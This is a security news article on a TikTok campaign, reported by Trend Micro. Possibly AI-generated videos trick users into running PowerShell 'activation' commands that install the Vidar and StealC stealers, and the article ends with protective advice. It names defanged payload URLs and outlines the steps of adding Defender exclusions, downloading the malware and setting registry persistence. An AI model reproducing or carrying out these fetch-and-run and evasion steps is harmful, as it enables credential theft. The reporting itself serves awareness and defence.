TikTok videos lure users with pirated apps, deliver Vidar and StealC Malware

Fake videos promote a way of allegedly getting free Windows, Spotify, and other apps

On May 21, 2025, Trend Micro specialists uncovered^[1] a sophisticated social engineering campaign exploiting TikTok to distribute the Vidar and StealC information-stealing malware. The tactic involves videos promising pirated apps, such as cracked versions of Windows OS, Microsoft Office, or Spotify, which entice users with free access to premium software.

These videos, potentially generated using AI tools, instruct viewers to execute harmful PowerShell commands disguised as activation steps. The campaign leverages TikTok’s vast user base and algorithmic reach, with one video amassing over half a million views, posing a significant threat to both individuals and businesses.

The ClickFix tactic,^[2] as identified by Trend Micro, tricks users into running malicious scripts by presenting them as legitimate fixes. Attackers guide victims to open PowerShell via the Win + R command and execute scripts from URLs like hxxps://allaivo[.]me/spotify, leading to hidden directories in APPDATA and LOCALAPPDATA folders.

These scripts add the malware to Windows Defender’s exclusion list to evade detection, then download Vidar or StealC from domains like hxxps://amssh[.]co/file.exe. The malware establishes persistence through registry keys and connects to command-and-control (C&C) servers, some hosted on legitimate platforms like Steam and Telegram, amplifying the risk of data exfiltration and credential theft.

Escalating risks on social media

This campaign shifts away from traditional malware delivery methods, such as fake CAPTCHA pages, by harnessing TikTok’s viral potential. As researchers from Trend Micro said:

Trend Research uncovered a new social engineering campaign using TikTok to deliver the Vidar and StealC information stealers. This attack uses videos (possibly AI-generated) to instruct users to execute PowerShell commands, which are disguised as software activation steps.

The use of AI enables attackers to rapidly produce tailored content, targeting diverse user groups and scaling the threat effectively. Businesses face risks of data breaches and credential theft, while individuals could lose personal information, necessitating urgent awareness efforts.

The campaign’s reliance on TikTok’s algorithmic reach^[3] amplifies its impact, turning social media into a prime attack vector. This approach challenges traditional detection methods, as the threat relies heavily on social engineering rather than embedded malware.

With cybercriminals increasingly exploiting popular platforms, educating users to avoid suspicious instructions, especially from AI-driven content, becomes essential. The involvement of high-viewership accounts further complicates detection, as the content blends seamlessly with legitimate TikTok trends, heightening the danger for unsuspecting users.

Protecting yourself: steps to stay safe from TikTok malware

Users can protect themselves by avoiding unfamiliar commands from TikTok videos and sticking to official app sources. Trend Micro recommends installing robust antivirus software, keeping systems updated, and enabling real-time protection to detect and block Vidar and StealC.

If a device is compromised, users should immediately disconnect from the internet, run a full system scan, reset passwords from a secure device, and consider professional assistance to remove persistent malware. Regular backups and monitoring for unusual activity, such as unexpected network traffic, can also help mitigate damage.

Businesses should prioritize security awareness training, focusing on recognizing AI-generated social engineering tactics. As researchers from Trend Micro said:

Businesses can be affected by data exfiltration, credential theft, and potential compromise of sensitive systems as a result of this threat. Reinforcing security awareness, especially against AI-generated content, is crucial.

Using network monitoring, restricting the use of PowerShell, and conducting periodical security audits can lower the threats as well. Since this threat is evolving and utilizing social media reach, proactiveness and implementing advanced threat detection tools are imperative in order to combat the mounting wave of cyberattacks against unsuspecting users.